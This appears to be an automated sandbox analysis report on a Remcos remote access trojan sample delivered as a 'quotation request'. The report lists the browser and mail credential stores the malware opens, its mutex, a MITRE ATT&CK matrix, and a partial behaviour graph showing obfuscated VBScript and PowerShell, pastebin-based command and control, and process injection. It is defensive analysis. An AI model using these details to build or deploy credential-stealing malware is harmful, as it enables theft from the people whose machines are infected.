                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 16_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,16_2_10002264
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_0041B69E GetUserNameW,22_2_0041B69E
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 22_2_00449210 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,22_2_00449210
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 27_2_0041739B GetVersionExW,27_2_0041739B
                    Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                    Stealing of Sensitive Information

                    barindex
                    Source: Yara matchFile source: 22.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1f1f6e4a0f0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.powershell.exe.165105a9888.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.21a905a9530.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.powershell.exe.165105a9888.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1f1f6e4a0f0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.21a905a9530.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000016.00000002.2292074002.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2903471856.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2497137064.0000021A90011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2497137064.0000021A90402000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2924119312.00000000026BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.2726582215.0000016510402000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001E.00000002.2387288107.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2594444392.000001F1F6B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data22_2_0040BA4D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\22_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: \key3.db22_2_0040BB6B
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Paltalk
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: ESMTPPassword28_2_004033F0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword28_2_00402DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword28_2_00402DB3

                    Remote Access Functionality

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-NACZDT
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-NACZDT
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-NACZDT
                    Source: Yara matchFile source: 22.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1f1f6e4a0f0.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 22.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.powershell.exe.165105a9888.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.21a905a9530.1.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 25.2.powershell.exe.165105a9888.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 19.2.powershell.exe.1f1f6e4a0f0.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 13.2.powershell.exe.21a905a9530.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000016.00000002.2292074002.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000016.00000002.2284090504.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2903471856.0000000000C28000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2497137064.0000021A90011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000000D.00000002.2497137064.0000021A90402000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.2924119312.00000000026BF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000019.00000002.2726582215.0000016510402000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 0000001E.00000002.2387288107.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000013.00000002.2594444392.000001F1F6B21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: cmd.exe22_2_0040569A
                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity Information321
                    Scripting
                    Valid Accounts11
                    Native API
                    321
                    Scripting
                    1
                    DLL Side-Loading
                    1
                    Disable or Modify Tools
                    2
                    OS Credential Dumping
                    2
                    System Time Discovery
                    Remote Services11
                    Archive Collected Data
                    1
                    Web Service
                    1
                    Exfiltration Over Alternative Protocol
                    1
                    System Shutdown/Reboot
                    CredentialsDomainsDefault Accounts1
                    Exploitation for Client Execution
                    1
                    DLL Side-Loading
                    1
                    Bypass User Account Control
                    1
                    Deobfuscate/Decode Files or Information
                    211
                    Input Capture
                    1
                    Account Discovery
                    Remote Desktop Protocol1
                    Data from Local System
                    12
                    Ingress Tool Transfer
                    Exfiltration Over Bluetooth1
                    Defacement
                    Email AddressesDNS ServerDomain Accounts32
                    Command and Scripting Interpreter
                    1
                    Windows Service
                    1
                    Access Token Manipulation
                    3
                    Obfuscated Files or Information
                    2
                    Credentials in Registry
                    1
                    System Service Discovery
                    SMB/Windows Admin Shares1
                    Email Collection
                    21
                    Encrypted Channel
                    Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal Accounts2
                    Service Execution
                    11
                    Registry Run Keys / Startup Folder
                    1
                    Windows Service
                    2
                    Software Packing
                    3
                    Credentials In Files
                    4
                    File and Directory Discovery
                    Distributed Component Object Model211
                    Input Capture
                    1
                    Non-Standard Port
                    Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud Accounts3
                    PowerShell
                    Network Logon Script321
                    Process Injection
                    1
                    DLL Side-Loading
                    LSA Secrets38
                    System Information Discovery
                    SSH3
                    Clipboard Data
                    1
                    Remote Access Software
                    Scheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts11
                    Registry Run Keys / Startup Folder
                    1
                    Bypass User Account Control
                    Cached Domain Credentials131
                    Security Software Discovery
                    VNCGUI Input Capture2
                    Non-Application Layer Protocol
                    Data Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                    File Deletion
                    DCSync21
                    Virtualization/Sandbox Evasion
                    Windows Remote ManagementWeb Portal Capture213
                    Application Layer Protocol
                    Exfiltration Over C2 ChannelInhibit System Recovery
                    Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
                    Masquerading
                    Proc Filesystem3
                    Process Discovery
                    Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                    Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                    Virtualization/Sandbox Evasion
                    /etc/passwd and /etc/shadow1
                    Application Window Discovery
                    Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                    IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                    Access Token Manipulation
                    Network Sniffing1
                    System Owner/User Discovery
                    Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                    Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd321
                    Process Injection
                    Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet
                    behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527623 Sample: Quotation request YN2024-10... Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 80 pastebin.com 2->80 82 paste.ee 2->82 84 6 other IPs or domains 2->84 118 Multi AV Scanner detection for domain / URL 2->118 120 Suricata IDS alerts for network traffic 2->120 122 Found malware configuration 2->122 126 21 other signatures 2->126 11 wscript.exe 1 2->11         started        14 cmd.exe 2->14         started        16 cmd.exe 2->16         started        signatures3 124 Connects to a pastebin service (likely for C&C) 82->124 process4 signatures5 142 VBScript performs obfuscated calls to suspicious functions 11->142 144 Suspicious powershell command line found 11->144 146 Wscript starts Powershell (via cmd or directly) 11->146 148 2 other signatures 11->148 18 powershell.exe 7 11->18         started        21 powershell.exe 14->21         started        23 conhost.exe 14->23         started        25 powershell.exe 16->25         started        27 conhost.exe 16->27         started        process6 signatures7 106 Suspicious powershell command line found 18->106 108 Self deletion via cmd or bat file 18->108 110 Tries to download and execute files (via powershell) 18->110 116 3 other signatures 18->116 29 powershell.exe 14 18 18->29         started        34 conhost.exe 18->34         started        112 Writes to foreign memory regions 21->112 114 Injects a PE file into a foreign processes 21->114 36 AddInProcess32.exe 21->36         started        38 conhost.exe 21->38         started        40 AddInProcess32.exe 21->40         started        42 AddInProcess32.exe 25->42         started        44 conhost.exe 25->44         started        process8 dnsIp9 92 simonastolerciuc.ro 